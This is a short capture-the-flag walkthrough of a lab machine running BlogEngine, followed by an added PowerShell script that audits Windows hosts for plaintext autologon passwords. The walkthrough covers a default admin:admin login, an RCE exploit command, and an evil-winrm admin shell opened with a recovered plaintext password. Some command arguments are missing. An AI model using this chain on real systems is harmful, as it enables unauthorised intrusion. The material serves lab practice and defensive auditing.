CyberSec Labs Engine Walkthrough

Port 80 open

Gobuster finds a directory /blog

It is the BlogEngine CMS, which is not configured properly and still has the default creds admin:admin

There’s an RCE exploit available for it

python exploit.py -t -l

For the proxy, we can turn Burp Suite on and send the payload through it.

After running the exploit we get the shell back.

Running winPEAS finds some autologin creds


Using evil-winrm we can get an admin shell

evil-winrm -u administrator -p "PzCEKhvj6gQMk7kA" -i

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
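
To check a host for the same weakness from the admin side, the audit below is an added example, not part of the original walkthrough. It assumes the autologin creds sit in the standard Winlogon registry key; the function names Test-AutologonExposure and Get-AutologonRisk are made up for this example.

```powershell
# Added audit example. Assumption: autologin creds are stored in the Winlogon key.
# Run from an elevated PowerShell 5.1+ prompt on the host being reviewed.
$WinlogonKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon'
)

function Test-AutologonExposure {
    param([string[]]$Path = $WinlogonKeys)
    foreach ($key in $Path) {
        if (-not (Test-Path $key)) { continue }
        $w  = Get-ItemProperty -Path $key
        $pw = $w.PSObject.Properties['DefaultPassword']
        [pscustomobject]@{
            Key             = $key
            AutoAdminLogon  = $w.AutoAdminLogon
            DefaultUserName = $w.DefaultUserName
            # Report only whether a plaintext password is present, never its value.
            PlaintextStored = [bool]($pw -and -not [string]::IsNullOrEmpty([string]$pw.Value))
        }
    }
}

function Get-AutologonRisk {
    # Members of BUILTIN\Administrators (well-known SID S-1-5-32-544).
    $admins = (Get-LocalGroupMember -SID 'S-1-5-32-544' -ErrorAction SilentlyContinue).Name
    # A running WinRM service is what lets stored creds be reused remotely.
    $winrm  = (Get-Service -Name WinRM -ErrorAction SilentlyContinue).Status -eq 'Running'

    foreach ($f in Test-AutologonExposure) {
        $user    = $f.DefaultUserName
        $isAdmin = [bool]($admins | Where-Object { ($_ -split '\\')[-1] -eq $user })
        $risk = if (-not $f.PlaintextStored)   { 'None' }
                elseif ($isAdmin -and $winrm)  { 'High' }    # the chain in this walkthrough
                elseif ($isAdmin)              { 'Medium' }
                else                           { 'Low' }
        [pscustomobject]@{
            Key             = $f.Key
            User            = $user
            PlaintextStored = $f.PlaintextStored
            IsLocalAdmin    = $isAdmin
            WinRMRunning    = $winrm
            Risk            = $risk
        }
    }
}

Get-AutologonRisk | Format-Table -AutoSize
```

Any row with PlaintextStored set to True means the DefaultPassword value should be deleted and that account's password rotated.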